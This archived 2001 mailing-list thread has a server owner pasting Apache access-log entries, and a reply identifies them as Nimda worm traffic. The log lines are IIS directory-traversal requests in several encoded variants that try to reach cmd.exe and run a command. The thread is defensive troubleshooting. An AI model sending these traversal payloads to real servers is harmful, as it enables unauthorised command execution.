[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [cobalt-users] access log weird stuff. hacker or virus

Subject: RE: [cobalt-users] access log weird stuff. hacker or virus
From: "Paul Cobalt" <pcobalt@xxxxxxxxxxxx>
Date: Thu Sep 27 14:59:09 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

That's just Nimda, round 2.. :) go see slashdot for details
(www.slashdot.org)

-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of brain_damaged
Sent: Friday, September 28, 2001 1:46 PM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: [cobalt-users] access log weird stuff. hacker or virus


Hello,
I went and check my access log and see this stuff.
Looking for winnt on a linux system ?


 tail access
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET
/_me
m_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
302
280 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET
/msa
dc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
32/c
md.exe?/c+dir HTTP/1.0" 302 308 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
/scr
ipts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
/scr
ipts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 235 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
/scr
ipts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
/scr
ipts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
/scr
ipts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
/scr
ipts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
/scr
ipts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 259 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET
/scr
ipts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 259 "-" "-"
[root httpd]#

_______________________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx
To Subscribe or Unsubscribe, please go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users

References:
- [cobalt-users] access log weird stuff. hacker or virus
  - From: brain_damaged

Prev by Date: RE: [cobalt-users] access log weird stuff. hacker or virus
Next by Date: Re: [cobalt-users] Outoing SMTP dead - Incoming POP appears OK
Previous by thread: RE: [cobalt-users] access log weird stuff. hacker or virus
Next by thread: Re: [cobalt-users] access log weird stuff. hacker or virus

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index